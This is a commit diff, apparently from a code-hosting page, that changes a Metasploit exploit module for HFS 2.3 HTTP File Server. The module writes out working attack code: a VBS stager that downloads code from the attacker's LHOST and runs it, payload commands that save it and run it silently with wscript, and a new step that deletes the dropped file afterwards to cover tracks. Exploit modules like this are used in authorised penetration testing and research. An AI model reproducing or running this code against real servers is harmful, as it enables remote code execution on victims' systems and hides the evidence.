mfadzilr
parent
978803e9d8
commit
677d035ce8
|
|
@ -57,7 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'uri' => '/'
|
'uri' => '/'
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex
|
if res.headers['Server'] =~ /HFS 2\.3/
|
||||||
|
# added proper regex as pointed by wchen
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
else
|
else
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
|
|
@ -69,7 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
exe = generate_payload_exe
|
exe = generate_payload_exe
|
||||||
vbs = Msf::Util::EXE.to_exe_vbs(exe)
|
vbs = Msf::Util::EXE.to_exe_vbs(exe)
|
||||||
send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
|
send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
|
||||||
remove_resource(get_resource) # remove resource after serving 1st reequest.
|
# remove resource after serving 1st request as 'exec' execute 4x
|
||||||
|
# during exploitation
|
||||||
|
remove_resource(get_resource)
|
||||||
end
|
end
|
||||||
|
|
||||||
def primer
|
def primer
|
||||||
|
|
@ -77,12 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
file_ext = '.vbs'
|
file_ext = '.vbs'
|
||||||
file_fullname = file_name + file_ext
|
file_fullname = file_name + file_ext
|
||||||
|
|
||||||
vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
|
vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
|
||||||
|
|
||||||
payloads = [
|
payloads = [
|
||||||
"save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
|
"save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
|
||||||
#"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
|
"exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}",
|
||||||
"exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix
|
# using wscript.exe instead of cmd.exe, thank mubix
|
||||||
|
"delete|#{datastore['SAVE_PATH']}#{file_fullname}"
|
||||||
|
# delete vbs file after execution
|
||||||
]
|
]
|
||||||
|
|
||||||
print_status("Sending a malicious request to #{target_uri.path}")
|
print_status("Sending a malicious request to #{target_uri.path}")
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue